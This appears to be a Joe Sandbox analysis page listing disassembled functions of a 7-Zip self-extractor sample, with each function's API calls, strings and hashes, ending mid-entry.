Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: HpA
API String ID: 801014965-2938899866
Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
DispatchMessageW.USER32(?), ref: 00401B89
KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99

Strings

Static, xrefs: 00401B5A

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298

Strings

, xrefs: 0040B22D

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-3916222277
Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D

Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51

Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119

Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
wsprintfW.USER32 ref: 004044A7

Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71

#17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533

Strings

7zSfxFolder%02d, xrefs: 004044A1
IA, xrefs: 0040447B

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d$IA
API String ID: 3387708999-1317665167
Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59

Strings

IA, xrefs: 00409391
IA, xrefs: 00409225

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@
String ID: IA$IA
API String ID: 1033339047-1400641299
Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00410D0D

Strings

HKA, xrefs: 00410CE9
\KA, xrefs: 00410CE2
4KA, xrefs: 00410CF0
$KA, xrefs: 00410CF7

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: free
String ID: $KA$4KA$HKA$\KA
API String ID: 1294909896-3316857779
Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004096D0
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941

Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B

Strings

HIA, xrefs: 0040978B

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@$H_prolog
String ID: HIA
API String ID: 3431946709-2712174624
Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
memcmp.MSVCRT(?,?,?), ref: 004028E4
memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570

Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC

Strings

ExecuteFile, xrefs: 00404A48

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@
String ID: ExecuteFile
API String ID: 1033339047-323923146
Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A

Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E

Strings

@, xrefs: 00402471

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D

Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5

Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A

Memory Dump Source

